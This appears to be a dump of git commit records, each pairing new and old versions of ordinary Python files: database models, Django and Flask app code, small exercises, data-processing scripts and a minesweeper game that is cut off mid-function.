cf3ed974c97d6eaa7983b249a65b4e6df4309c28 | Rename owners to instances | nycodex/db.py | nycodex/db.py | from enum import Enum
import os
import typing
import sqlalchemy
from sqlalchemy.dialects import postgresql
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base() # type: typing.Any
engine = sqlalchemy.create_engine(os.environ["DATABASE_URI"])
Session = sqlalchemy.orm.sessionmaker(bind=engine)
class DomainCategory(Enum):
    # Closed vocabulary of dataset categories; values are the
    # human-readable labels as published on the portal.
    BIGAPPS = "NYC BigApps"
    BUSINESS = "Business"
    CITY_GOVERNMENT = "City Government"
    EDUCATION = "Education"
    ENVIRONMENT = "Environment"
    HEALTH = "Health"
    HOUSING_DEVELOPMENT = "Housing & Development"
    PUBLIC_SAFETY = "Public Safety"
    RECREATION = "Recreation"
    SOCIAL_SERVICES = "Social Services"
    TRANSPORTATION = "Transportation"
class DbMixin():
    # Shared helpers for the declarative models below.  Subclasses get
    # __table__ from the declarative Base; it must have an `id` column.
    __table__: sqlalchemy.Table

    @classmethod
    def upsert(cls, conn: sqlalchemy.engine.base.Connection,
               instances: typing.Iterable["DbMixin"]) -> None:
        # Postgres INSERT ... ON CONFLICT (id) DO UPDATE for each
        # instance, refreshing every non-id column on conflict.
        keys = cls.__table__.c.keys()
        for instance in instances:
            data = {key: getattr(instance, key) for key in keys}
            insert = (postgresql.insert(cls.__table__).values(**data)
                      .on_conflict_do_update(
                          index_elements=[cls.__table__.c.id],
                          set_={k: data[k]
                                for k in data if k != 'id'}))
            conn.execute(insert)

    def __eq__(self, other):
        # Column-wise equality over mapped columns only.
        # NOTE(review): defining __eq__ without __hash__ makes instances
        # unhashable -- confirm these models never land in sets/dict keys.
        keys = self.__table__.c.keys()
        return ({key: getattr(self, key)
                 for key in keys} == {
                     key: getattr(other, key)
                     for key in keys
                 })
class Dataset(Base, DbMixin):
    __tablename__ = "dataset"

    # Dataset identifier: fixed-width 9-character code.
    id = sqlalchemy.Column(sqlalchemy.CHAR(9), primary_key=True)
    name = sqlalchemy.Column(sqlalchemy.VARCHAR, nullable=False)
    description = sqlalchemy.Column(sqlalchemy.TEXT, nullable=False)
    owner_id = sqlalchemy.Column(
        sqlalchemy.CHAR(9), sqlalchemy.ForeignKey("owner.id"))
    # Stored as a Postgres enum built from DomainCategory's values.
    domain_category = sqlalchemy.Column(
        postgresql.ENUM(
            * [v.value for v in DomainCategory.__members__.values()],
            name="DomainCategory"),
        nullable=True)
class Owner(Base, DbMixin):
    __tablename__ = "owner"

    # Owner identifier: same fixed-width 9-character code as Dataset.id.
    id = sqlalchemy.Column(sqlalchemy.CHAR(9), primary_key=True)
    name = sqlalchemy.Column(sqlalchemy.TEXT, nullable=False)
| from enum import Enum
import os
import typing
import sqlalchemy
from sqlalchemy.dialects import postgresql
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
engine = sqlalchemy.create_engine(os.environ["DATABASE_URI"])
Session = sqlalchemy.orm.sessionmaker(bind=engine)
class DomainCategory(Enum):
BIGAPPS = "NYC BigApps"
BUSINESS = "Business"
CITY_GOVERNMENT = "City Government"
EDUCATION = "Education"
ENVIRONMENT = "Environment"
HEALTH = "Health"
HOUSING_DEVELOPMENT = "Housing & Development"
PUBLIC_SAFETY = "Public Safety"
RECREATION = "Recreation"
SOCIAL_SERVICES = "Social Services"
TRANSPORTATION = "Transportation"
class DbMixin():
@classmethod
def upsert(cls, conn: sqlalchemy.engine.base.Connection,
owners: typing.Iterable["Owner"]) -> None:
keys = cls.__table__.c.keys()
for owner in owners:
data = {key: getattr(owner, key) for key in keys}
insert = (postgresql.insert(cls.__table__).values(**data)
.on_conflict_do_update(
index_elements=[cls.__table__.c.id],
set_={k: data[k]
for k in data if k != 'id'}))
conn.execute(insert)
def __eq__(self, other):
keys = self.__table__.c.keys()
return ({key: getattr(self, key)
for key in keys} == {
key: getattr(other, key)
for key in keys
})
class Dataset(Base, DbMixin):
__tablename__ = "dataset"
id = sqlalchemy.Column(sqlalchemy.CHAR(9), primary_key=True)
name = sqlalchemy.Column(sqlalchemy.VARCHAR, nullable=False)
description = sqlalchemy.Column(sqlalchemy.TEXT, nullable=False)
owner_id = sqlalchemy.Column(
sqlalchemy.CHAR(9), sqlalchemy.ForeignKey("owner.id"))
domain_category = sqlalchemy.Column(
postgresql.ENUM(
* [v.value for v in DomainCategory.__members__.values()],
name="DomainCategory"),
nullable=True)
class Owner(Base, DbMixin):
__tablename__ = "owner"
id = sqlalchemy.Column(sqlalchemy.CHAR(9), primary_key=True)
name = sqlalchemy.Column(sqlalchemy.TEXT, nullable=False)
| Python | 0.000082 |
db195957288ef7b6c5c9de6551689d4d06db28c1 | Create add_digits.py | lintcode/naive/add_digits/py/add_digits.py | lintcode/naive/add_digits/py/add_digits.py | class Solution:
# @param {int} num a non-negative integer
# @return {int} one digit
def addDigits(self, num):
while len(str(num)) > 1:
num = sum(map(int, str(num)))
return num
| Python | 0.000094 | |
836845abde53ee55bca93f098ece78880ab6b5c6 | Use same variable names as testing environment | examples/events/create_massive_dummy_events.py | examples/events/create_massive_dummy_events.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from keys import url, key
import argparse
import tools

if __name__ == '__main__':
    # CLI: create -l/--limit events, each with -a/--attribute attributes.
    # Fixed the user-facing description ("number of event ... eachh").
    parser = argparse.ArgumentParser(description='Create a given number of events containing a given number of attributes each.')
    parser.add_argument("-l", "--limit", type=int, help="Number of events to create (default 1)")
    parser.add_argument("-a", "--attribute", type=int, help="Number of attributes per event (default 3000)")
    args = parser.parse_args()

    # Third positional argument enables SSL verification; output is JSON.
    misp = PyMISP(url, key, True, 'json')

    if args.limit is None:
        args.limit = 1
    if args.attribute is None:
        args.attribute = 3000

    for i in range(args.limit):
        tools.create_massive_dummy_events(misp, args.attribute)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from keys import misp_url, misp_key, misp_verifycert
import argparse
import tools
def init(url, key):
return PyMISP(url, key, misp_verifycert, 'json')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Create a given number of event containing a given number of attributes eachh.')
parser.add_argument("-l", "--limit", type=int, help="Number of events to create (default 1)")
parser.add_argument("-a", "--attribute", type=int, help="Number of attributes per event (default 3000)")
args = parser.parse_args()
misp = init(misp_url, misp_key)
if args.limit is None:
args.limit = 1
if args.attribute is None:
args.attribute = 3000
for i in range(args.limit):
tools.create_massive_dummy_events(misp, args.attribute)
| Python | 0.000016 |
2d12c640e42e83580ee27933f0ad9bed2ebcc169 | add allauth and make owner of audio required | satsound/migrations/0007_auto_20170115_0331.py | satsound/migrations/0007_auto_20170115_0331.py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-01-15 03:31
from __future__ import unicode_literals
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make SatelliteAudio.user a required foreign key to the auth user model."""
    dependencies = [
        ('satsound', '0006_auto_20161230_0403'),
    ]
    operations = [
        migrations.AlterField(
            model_name='satelliteaudio',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
    ]
| Python | 0 | |
a635a8d58e46cf4ef1bc225f8824d73984971fee | Add the answer to the sixth question of Assignment 3 | countVowels.py | countVowels.py | """ Q6- Write a program that counts up the number of vowels contained in the string s. Valid vowels are: 'a', 'e', 'i',
'o', and 'u'. For example, if s = 'azcbobobegghakl', your program should print: Number of vowels: 5
"""
# Using the isVowel function from isVowel.py module (Answer of fifth question of Assignment 3)
def isVowel(char):
    """Return True when char is exactly one of the lowercase vowels a, e, i, o, u."""
    # Tuple membership compares with ==, so only a single exact character matches
    # (e.g. 'ae' and 'A' are both False, just like the original equality chain).
    return char in ('a', 'e', 'i', 'o', 'u')
def countVowels(string):
    """Print the vowel count of an all-lowercase string, or an error message.

    Empty strings and strings containing uppercase characters are rejected.
    """
    if not str.islower(string):
        # islower() is False for both empty strings and strings with uppercase
        # letters; distinguish the two cases for the error message.
        if len(string):
            print("Error: All the characters in the string should be in LOWERCASE.")
        else:
            print("Error: The string is EMPTY.")
        return
    total = sum(1 for letter in string if isVowel(letter))
    print("Number of vowels: " + str(total))
# Interactive entry point: read a string from stdin and report its vowel count.
string = input( "Enter the string: " )
countVowels( string )
58fabd7929a4c712f5e87a39aaf8c34bae8759b8 | Add photos to the admin | quickphotos/admin.py | quickphotos/admin.py | from django.contrib import admin
from .models import Photo
@admin.register(Photo)
class PhotoAdmin(admin.ModelAdmin):
    """Read-only admin for synced photos: browsable and filterable, never editable."""
    list_display = ('user', 'caption', 'created')
    list_filter = ('created',)
    date_hierarchy = 'created'
    readonly_fields = (
        'photo_id', 'user', 'image', 'created', 'caption', 'link', 'like_count', 'comment_count')
    fieldsets = (
        (None, {
            'fields': readonly_fields,
        }),
    )
    def has_add_permission(self, request):
        # Photos come from the sync pipeline, so manual creation is disabled.
        return False
| Python | 0 | |
f7035a6c328bb237dd3c9be5d9da805606e059ae | Create adjust_xml_impath.py | object_detection/adjust_xml_impath.py | object_detection/adjust_xml_impath.py | import os
import glob
import re
import argparse
# Rewrite the <folder>/<path> entries of every Pascal-VOC XML annotation in a
# directory so they point at the given image subfolder under the current cwd.
ap = argparse.ArgumentParser()
ap.add_argument('-i', '--input_xml_dir', type=str, default='./annot', help='path to root dir of xmls')
ap.add_argument('-s', '--subfolder', type=str, default='images', help='name of image subfolder')
args = vars(ap.parse_args())

xmls = glob.glob(os.path.join(args['input_xml_dir'], '*xml'))
print('found %d xmls.' % len(xmls))

# Normalize away a single trailing slash so substituted paths stay clean.
subfolder = args['subfolder'] if not args['subfolder'].endswith('/') else args['subfolder'][:-1]
print('image sub folder:', subfolder)

pattern1 = r'<filename>(.*?)</filename>'
pattern2 = r'<folder>.*?</folder>'
pattern3 = r'<path>.*?</path>'

for xml in xmls:
    with open(xml, 'r') as fin:
        s = fin.read()
    filename = re.findall(pattern1, s)[0]
    # Fix: use the normalized `subfolder` (the original computed it but then
    # substituted the raw args value, so the trailing-slash stripping was dead).
    s = re.sub(pattern2, '<folder>%s</folder>' % subfolder, s)
    # NOTE(review): the replacement string is interpreted by re.sub, so
    # backslashes in cwd (e.g. Windows paths) act as escapes -- verify on Windows.
    s = re.sub(pattern3, '<path>%s/%s/%s</path>' % (os.getcwd(), subfolder, filename), s)
    # Fix: write in text mode; the original opened 'wb' and writing a str to a
    # binary handle raises TypeError on Python 3.
    with open(xml, 'w') as fout:
        fout.write(s)
| Python | 0.000004 | |
0266a6cec641f244a8788f50f80ac3f11f87e1e4 | Add back fix_root script | scripts/fix_root.py | scripts/fix_root.py | import sys
import logging
from website.app import setup_django
setup_django()
from scripts import utils as script_utils
from osf.models import AbstractNode
from framework.database import paginated
logger = logging.getLogger(__name__)
def main(dry=True):
    """Backfill AbstractNode.root so it matches each node's computed true root.

    When ``dry`` is True, only log what would change without writing to the DB.
    """
    count = 0
    for node in paginated(AbstractNode, increment=1000):
        true_root = node.get_root()
        if not node.root or node.root.id != true_root.id:
            count += 1
            logger.info('Setting root for node {} to {}'.format(node._id, true_root._id))
            if not dry:
                # Queryset .update() writes directly at the SQL layer without
                # calling save() or firing model signals.
                AbstractNode.objects.filter(id=node.id).update(root=true_root)
    logger.info('Finished migrating {} nodes'.format(count))
if __name__ == '__main__':
    dry = '--dry' in sys.argv
    if not dry:
        # Persist logs to a file only when actually mutating data.
        script_utils.add_file_logger(logger, __file__)
    main(dry=dry)
| Python | 0.000001 | |
ecc15e50967f61e9e8ba8a96d4b8f6855c77b401 | Create geoprocess_exposure.py | hurricane/geoprocess_exposure.py | hurricane/geoprocess_exposure.py | import sys
import os
import datetime
import psycopg2
import pandas
from subprocess import call, Popen
conn_string = "dbname='hamlethurricane' user=postgres port='5432' host='127.0.0.1' password='password'"
os.system("exit")
os.system("exit")
print "Connecting to database..."
try:
conn = psycopg2.connect(conn_string)
except Exception as e:
print str(e)
sys.exit()
print "Connected!\n"
hurricane_name = 'ARTHUR'
dataframe_cur = conn.cursor()
dataframe_sql = """Select * from hurricane_{}""".format(hurricane_name)
dataframe_cur.execute(dataframe_sql)
data = dataframe_cur.fetchall()
colnames = [desc[0] for desc in dataframe_cur.description]
dataframe = pandas.DataFrame(data)
dataframe.columns = colnames
conn.commit()
range_feat = range(len(dataframe)-1)
range_feat_strp = str(range_feat).strip('[]')
range_feat_strp_v2 = range_feat_strp.split(',')
print range_feat_strp_v2
drop_if_sql = """drop table if exists hurricane_{}_parcels, exposed_parcels""".format(hurricane_name)
drop_if_cur = conn.cursor()
drop_if_cur.execute(drop_if_sql)
creation_cur = conn.cursor()
creation_sql = """create table hurricane_{}_parcels as
select * from dare_4326""".format(hurricane_name,hurricane_name)
creation_cur.execute(creation_sql)
conn.commit()
add_cur = conn.cursor()
add_sql = """alter table hurricane_{}_parcels
add column andrew_impact character varying(50),
add column iso_time character varying (19)
""".format(hurricane_name)
add_cur.execute(add_sql)
conn.commit()
buffer_cur = conn.cursor()
intersect_cur = conn.cursor()
for key in range(1,len(dataframe)-1):
sql = """create or replace view vw_parcels_impact_{} as
select a.nparno, b.iso_time, b.ogc_fid, a.geom as geom
from dare_4326 as a
inner join vw_rmw_{} as b
on st_intersects(b.geom,a.geom)
group by a.nparno, b.iso_time, b.ogc_fid, a.geom;""".format(key, key)
print sql
intersect_cur.execute(sql)
conn.commit()
update_cur = conn.cursor()
for key in range(1, len(dataframe)-1):
sql = """update hurricane_{}_parcels as a
set iso_time = b.iso_time
from vw_parcels_impact_{} as b
where a.nparno = b.nparno""".format(hurricane_name, key)
print sql
update_cur.execute(sql)
conn.commit()
exposed_cur = conn.cursor()
exposed_sql = """create table exposed_parcels as
select * from hurricane_{}_parcels where iso_time is not null""".format(hurricane_name, hurricane_name)
exposed_cur.execute(exposed_sql)
exposed_cur = conn.cursor()
conn.commit()
| Python | 0.000001 | |
8578320e023dc3424da055c4a506931ec44b19ce | Save user's name to db when verifying AGA id | web/app/verify/views.py | web/app/verify/views.py | from . import verify
from .aga_membership import get_aga_info
from flask import abort, redirect, url_for, render_template, current_app
from flask.ext.security import login_required
from flask.ext.login import current_user
from flask.ext.wtf import Form
from flask.ext.mail import Message
from sqlalchemy.sql import and_
from itsdangerous import BadSignature, URLSafeSerializer
from app.models import User, db
from wtforms import IntegerField, SubmitField
from wtforms.validators import Required
def get_serializer(secret_key=None):
    """Build a URL-safe serializer, defaulting to the app's SECRET_KEY."""
    key = current_app.config['SECRET_KEY'] if secret_key is None else secret_key
    return URLSafeSerializer(key)
@verify.route('/verify/<payload>')
@login_required
def verify_player(payload):
    """Complete AGA-ID verification from a signed email link.

    ``payload`` is a signed [user_id, aga_id] pair produced by get_verify_link;
    any tampering, wrong logged-in user, or unknown AGA id yields a 404.
    """
    s = get_serializer()
    try:
        user_id, aga_id = s.loads(payload)
    except BadSignature:
        current_app.logger.info('Verify called with invalid paylod')
        abort(404)
    if user_id != current_user.id:
        # The link may only be redeemed by the account that requested it.
        current_app.logger.warn("Verify called for id %s, but wrong user answered, %s" % (user_id, current_user))
        abort(404)
    aga_info = get_aga_info(aga_id)
    if aga_info is None:
        current_app.logger.warn("Could not fetch AGA info for aga_id %s" % aga_id)
        abort(404)
    user_realname = aga_info.get('full_name', '')
    # TODO: Fetch the fake user account with this aga_id, take its AGA player
    # and reassign it to the real user
    user = User.query.get_or_404(user_id)
    user.aga_id = aga_id
    user.name = user_realname
    db.session.add(user)
    db.session.commit()
    msg = 'Linked account with AGA #%s' % user.aga_id
    current_app.logger.info(msg)
    return redirect(url_for('ratings.profile'))
def get_verify_link(user, aga_id):
    """Return an absolute /verify/<payload> URL carrying a signed (user.id, aga_id) pair."""
    s = get_serializer()
    payload = s.dumps([user.id, aga_id])
    return url_for('.verify_player', payload=payload,
                   _external=True)
def aga_id_already_used(user, aga_id):
    """Return True when a different, non-fake account already claims this AGA id."""
    exists = User.query.filter(and_(User.id!=user.id, User.aga_id==str(aga_id), User.fake==False)).count() > 0
    return exists
def send_verify_email(user, aga_id):
    """Email a signed verification link to the AGA member's address on file.

    Returns False when the AGA membership lookup fails, True once the mail is sent.
    """
    aga_info = get_aga_info(aga_id)
    if aga_info is None:
        return False
    email_address = aga_info['email']
    email_subject = "Confirm AGA ID for Online Ratings"
    email_body = render_template('verify/verification_email.html',
        user=user, aga_id=aga_id, verify_link=get_verify_link(user, aga_id))
    email = Message(
        recipients=[email_address],
        subject=email_subject,
        html=email_body,
    )
    current_app.extensions.get('mail').send(email)
    return True
@verify.route('/verify', methods=['GET', 'POST'])
@login_required
def verify_form():
    """Show the AGA-number form; on valid POST, trigger the verification email.

    Rejects AGA ids already linked to another real account before sending.
    """
    form = LinkUserWithAGANumberForm()
    if form.validate_on_submit():
        aga_id = form.aga_id.data
        if aga_id_already_used(current_user, aga_id):
            return render_template('verify/verify_form_post_submit_conflict.html', aga_id=aga_id)
        success = send_verify_email(current_user, aga_id)
        if success:
            return render_template('verify/verify_form_post_submit.html')
        else:
            return render_template('verify/verify_form_post_submit_error.html', aga_id=aga_id)
    return render_template('verify/verifyform.html', form=form)
class LinkUserWithAGANumberForm(Form):
    """Single-field form asking the member for their AGA number."""
    aga_id = IntegerField('Aga number?',
                          validators=[Required()])
    submit = SubmitField()
| from . import verify
from .aga_membership import get_aga_info
from flask import abort, redirect, url_for, render_template, current_app
from flask.ext.security import login_required
from flask.ext.login import current_user
from flask.ext.wtf import Form
from flask.ext.mail import Message
from sqlalchemy.sql import and_
from itsdangerous import BadSignature, URLSafeSerializer
from app.models import User, db
from wtforms import IntegerField, SubmitField
from wtforms.validators import Required
def get_serializer(secret_key=None):
if secret_key is None:
secret_key = current_app.config['SECRET_KEY']
return URLSafeSerializer(secret_key)
@verify.route('/verify/<payload>')
@login_required
def verify_player(payload):
s = get_serializer()
try:
user_id, aga_id = s.loads(payload)
except BadSignature:
current_app.logger.info('Verify called with invalid paylod')
abort(404)
if user_id != current_user.id:
current_app.logger.warn("Verify called for id %s, but wrong user answered, %s" % (user_id, current_user))
abort(404)
# TODO: Fetch the fake user account with this aga_id, take its AGA player
# and reassign it to the real user
user = User.query.get_or_404(user_id)
user.aga_id = aga_id
db.session.add(user)
db.session.commit()
msg = 'Linked account with AGA #%s' % user.aga_id
current_app.logger.info(msg)
return redirect(url_for('ratings.profile'))
def get_verify_link(user, aga_id):
s = get_serializer()
payload = s.dumps([user.id, aga_id])
return url_for('.verify_player', payload=payload,
_external=True)
def aga_id_already_used(user, aga_id):
exists = User.query.filter(and_(User.id!=user.id, User.aga_id==str(aga_id), User.fake==False)).count() > 0
return exists
def send_verify_email(user, aga_id):
aga_info = get_aga_info(aga_id)
if aga_info is None:
return False
email_address = aga_info['email']
email_subject = "Confirm AGA ID for Online Ratings"
email_body = render_template('verify/verification_email.html',
user=user, aga_id=aga_id, verify_link=get_verify_link(user, aga_id))
email = Message(
recipients=[email_address],
subject=email_subject,
html=email_body,
)
current_app.extensions.get('mail').send(email)
return True
@verify.route('/verify', methods=['GET', 'POST'])
@login_required
def verify_form():
form = LinkUserWithAGANumberForm()
if form.validate_on_submit():
aga_id = form.aga_id.data
if aga_id_already_used(current_user, aga_id):
return render_template('verify/verify_form_post_submit_conflict.html', aga_id=aga_id)
success = send_verify_email(current_user, aga_id)
if success:
return render_template('verify/verify_form_post_submit.html')
else:
return render_template('verify/verify_form_post_submit_error.html', aga_id=aga_id)
return render_template('verify/verifyform.html', form=form)
class LinkUserWithAGANumberForm(Form):
aga_id = IntegerField('Aga number?',
validators=[Required()])
submit = SubmitField()
| Python | 0 |
ac3a3b583b028e53d80749eaaee58b4eb80d1c6a | Implement stack functionality | stack/stack.py | stack/stack.py |
class Node(object):
    """Singly linked node holding a value and a reference to the next node."""
    def __init__(self, value=None, next_node=None):
        self.value = value
        self.next_node = next_node


class Stack(object):
    """LIFO stack backed by a singly linked list of Node objects."""
    def __init__(self, head=None):
        self.head = head

    def push(self, data):
        """Wrap data in a Node and make it the new top of the stack."""
        self.head = Node(data, self.head)

    def pop(self):
        """Remove and return the top value; raise LookupError when empty."""
        if not self.head:
            raise LookupError
        top = self.head
        self.head = top.next_node
        return top.value

    def write_output(self):
        """Drain the stack, keeping every other popped value (1st, 3rd, ...), space-joined."""
        kept = []
        index = 1
        while self.head:
            value = self.pop()
            if index % 2:
                kept.append(str(value))
            index += 1
        return ' '.join(kept)
| Python | 0.000002 | |
a6137714c55ada55571759b851e1e4afa7818f29 | Add cli tool to delete documents. | app/utils/scripts/delete-docs.py | app/utils/scripts/delete-docs.py | #!/usr/bin/python
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Basic command line script to delete documents."""
import argparse
import sys
import models
import utils
import utils.db
COLLECTIONS = [
models.BOOT_COLLECTION,
models.DEFCONFIG_COLLECTION,
models.JOB_COLLECTION,
models.LAB_COLLECTION
]
ALL_COLLECTIONS = [
"all"
]
ALL_COLLECTIONS.extend(COLLECTIONS)
def parse_fields(fields):
    """Yield [key, value] pairs parsed from "key=value" strings.

    Strings without an '=' are logged as invalid and skipped; the value part
    keeps any further '=' characters intact.
    """
    for raw in fields:
        if "=" not in raw:
            utils.LOG.error("Field %s is not valid, not considered", raw)
            continue
        yield raw.split("=", 1)
def _delete_with_spec(collection, spec_or_id, database):
    """Delete documents matching ``spec_or_id`` from one collection, or all of them.

    Exits the process with status 1 when the deletion does not report 200.
    """
    ret_val = None
    if collection == "all":
        utils.LOG.info("Deleting documents in all collections")
        for coll in COLLECTIONS:
            utils.LOG.info("Deleting from %s...", coll)
            # Fix: use the spec_or_id argument; the original referenced the
            # module-global `spec`, silently ignoring the caller's filter.
            ret_val = utils.db.delete(database[coll], spec_or_id)
    else:
        ret_val = utils.db.delete(database[collection], spec_or_id)

    if ret_val == 200:
        utils.LOG.info("Documents identified deleted: %s", spec_or_id)
    else:
        utils.LOG.error(
            "Error deleting documents with the provided values: %s",
            spec_or_id)
        sys.exit(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Import boots from disk",
version=0.1
)
parser.add_argument(
"--collection", "-c",
type=str,
help="The name of the job to import",
dest="collection",
required=True,
choices=ALL_COLLECTIONS
)
parser.add_argument(
"--field", "-f",
help=(
"The necessary fields to identify the elements to delete; "
"they must be defined as key=value pairs"
),
dest="fields",
action="append",
required=True
)
args = parser.parse_args()
collection = args.collection
fields = args.fields
spec = {
k: v for k, v in parse_fields(fields)
}
if spec:
database = utils.db.get_db_connection({})
_delete_with_spec(collection, spec, database)
else:
utils.LOG.error("Don't know what to look for...")
sys.exit(1)
| Python | 0.000013 | |
c71a3f1adbf310c63ce9ab7611cf0e198ffe69da | Add load test | metakernel/magics/tests/test_load_magic.py | metakernel/magics/tests/test_load_magic.py |
from metakernel.tests.utils import get_kernel
def test_load_magic():
    """%%load on this source file should echo the file's own text back as payload."""
    kernel = get_kernel()
    ret = kernel.do_execute("%%load %s" % __file__)
    assert 'def test_load_magic' in ret['payload'][0]['text']
| Python | 0.000001 | |
e575f343f55fd54994fdb1f4d02fe6e2e52ba056 | add phonetizer.py - really | phonetizer.py | phonetizer.py | import re
class Phonetizer():
# Define shorthands for phonological classes
ph_classes = {
'C' : 'p|t|k|b|d|g',
'V' : 'a|e|i|o|u|y'
}
def __init__(self, mappings_filename):
with open(mappings_filename) as mfile:
self.read_mfile(mfile)
def read_mfile(self, mfile):
"""
"""
self.ortho_maps = []
self.phone_maps = []
for line in mfile:
sline = line[:-1].split('\t') # fix this using csv so the user doesn't have to have an extra blank line!
if len(sline) == 2:
self.ortho_maps.append((sline[0],sline[1]))
elif len(sline) == 3:
self.phone_maps.append((sline[0],sline[1]))
self.ortho_maps.sort(key=lambda x: len(x[0]))
self.ortho_maps.reverse()
def read_wfile(self, ttfilename):
with open(ttfilename) as ttfile:
return [(line[:-1].split('\t')[0],line[:-1].split('\t')[1]) for line in ttfile]
def run_tests(self, ttfilename):
cases = self.read_wfile(ttfilename)
for c in cases:
transcription = self.phonetize(c[0])
if transcription != c[1]:
print('Output [{}] should have been [{}].'.format(transcription, c[1]))
def phonetize(self, ortho):
result = ['' for character in ortho]
# go from ortho to initial transcription
for om in self.ortho_maps:
hits = re.finditer(om[0], ortho)
for hit in hits:
result[hit.start()] = om[1]
ortho = ''.join(['*' if i in range(hit.start(), hit.end()) else c for i,c in enumerate(ortho)])
for i,character in enumerate(ortho):
if character != '*':
result[i] = character
result = ''.join(result)
# apply "phonology"
loop_input_str = ''.join(result)
new_result = ['' for character in result]
while True:
loop_input = loop_input_str
new_result = [c for c in loop_input_str]
for pm in self.phone_maps:
hits = re.finditer(pm[0], loop_input_str)
for hit in hits:
new_result[hit.start()] = pm[1]
for i in range(hit.start()+1, hit.end()):
new_result[i] = ''
loop_input = ''.join(['*' if i in range(hit.start(), hit.end()) else c for i,c in enumerate(loop_input)])
if ''.join(new_result) == loop_input_str:
return loop_input_str
else:
loop_input_str = ''.join(new_result)
#### Quick, temp lines for testing
# NOTE(review): runs at import time and requires test_mappings.txt and
# test_ortho.txt to exist next to this file.
p = Phonetizer('test_mappings.txt')
p.run_tests('test_ortho.txt')
91a23d6a946f70b4750e9141fb71e0bd3b7c2705 | Rename the main file to minesweeper.py | minesweeper.py | minesweeper.py | import pygame
import random
from constants import *
def initialize():
    """Start pygame and set the window caption."""
    # Do initial window and pygame management
    pygame.init()
    pygame.display.set_caption("Minesweeper PRE-ALPHA")
def get_screen():
    """Create and return the main display surface sized from constants."""
    # create and return the screen
    # NOTE(review): pygame.display.set_mode expects (width, height); confirm
    # the (SCREEN_HEIGHT, SCREEN_WIDTH) ordering here is intentional.
    size = (SCREEN_HEIGHT, SCREEN_WIDTH)
    screen = pygame.display.set_mode(size)
    return screen
def generate_mines():
    """Return a ROWS x COLUMNS grid with exactly MINES cells set to 1.

    Cells are drawn uniformly at random and re-rolled on collisions, so no
    cell ever holds more than one mine.
    """
    mine_grid = [[0 for x in range(COLUMNS)] for y in range(ROWS)]
    total_mines = 0
    # Fix: the original wrapped this in a pointless `for rows in range(ROWS)`
    # loop; the while loop already places every mine on its first pass and the
    # remaining iterations were dead.
    while total_mines < MINES:
        row = random.randrange(0, ROWS)
        column = random.randrange(0, COLUMNS)
        if mine_grid[row][column] == 0:
            mine_grid[row][column] = 1
            total_mines += 1
    return mine_grid
def reveal_neighbors(row, column, clicked_grid):
    """Mark the four orthogonal neighbours of (row, column) as clicked, in place."""
    # Bounds checks named after what they actually guard (the original's
    # left/right referred to the row axis, which was misleading).
    has_row_above = row >= 1
    has_row_below = row < ROWS - 1
    has_col_left = column >= 1
    has_col_right = column < COLUMNS - 1
    if has_row_below:
        clicked_grid[row + 1][column] = 1
    if has_col_left:
        clicked_grid[row][column - 1] = 1
    if has_col_right:
        clicked_grid[row][column + 1] = 1
    if has_row_above:
        clicked_grid[row - 1][column] = 1
def get_block_color(row, column, clicked_grid):
    """Return the draw color for one cell and auto-reveal neighbours of empty cells.

    Unclicked cells are WHITE, clicked mines RED, and clicked safe cells are
    color-coded by their neighbouring mine count (0..8). Reads the module-level
    mine_grid created in the __main__ block rather than taking it as a parameter.
    """
    mine_count = count_mine_neighbors(row, column, mine_grid)
    if clicked_grid[row][column] == 0:
        grid_color = WHITE
    elif mine_grid[row][column] == 1:
        grid_color = RED
    elif mine_count == 0:
        grid_color = BLUE
        # Flood-reveal: zero-neighbour cells open their orthogonal neighbours,
        # which cascades on subsequent draw passes.
        reveal_neighbors(row, column, clicked_grid)
    elif mine_count == 1:
        grid_color = CYAN
    elif mine_count == 2:
        grid_color = DARKGREEN
    elif mine_count == 3:
        grid_color = GREEN
    elif mine_count == 4:
        grid_color = LITEGREEN
    elif mine_count == 5:
        grid_color = PURPLE
    elif mine_count == 6:
        grid_color = PINK
    elif mine_count == 7:
        grid_color = YELLOW
    elif mine_count == 8:
        grid_color = ORANGE
    return grid_color
def draw_grid(clicked_grid, mine_grid, screen):
    """Draw every cell as a margin-separated rectangle in its current color.

    NOTE(review): the mine_grid parameter is unused here -- get_block_color
    reads the module-level mine_grid instead.
    """
    for column in range(0, COLUMNS):
        for row in range(0, ROWS):
            block_color = get_block_color(row, column, clicked_grid)
            pygame.draw.rect(screen, block_color,
                             (column * GRID_WIDTH + (column + 1) * MARGIN,
                              row * GRID_HEIGHT + (row + 1) * MARGIN,
                              GRID_WIDTH,
                              GRID_HEIGHT))
def main_loop():
    """Run the event/draw loop at 60 FPS until the window is closed.

    Relies on the module-level clicked_grid, mine_grid, screen and clock
    created in the __main__ block.
    """
    done = False
    while not done:
        for event in pygame.event.get(): # User did something
            if event.type == pygame.QUIT: # If user clicked close
                done = True # Flag that we are done so we exit this loop
            if event.type == pygame.MOUSEBUTTONDOWN:
                Controls.mouse_down(clicked_grid)
        draw_grid(clicked_grid, mine_grid, screen)
        # Update the screen with what is drawn.
        pygame.display.flip()
        clock.tick(60)
def count_mine_neighbors(row, column, mine_grid):
    """Return how many of the (up to 8) cells surrounding (row, column) hold a mine."""
    mine_neighbor_count = 0
    # Walk all eight neighbour offsets, skipping the cell itself and anything
    # outside the grid bounds.
    for row_delta in (-1, 0, 1):
        for col_delta in (-1, 0, 1):
            if row_delta == 0 and col_delta == 0:
                continue
            neighbor_row = row + row_delta
            neighbor_col = column + col_delta
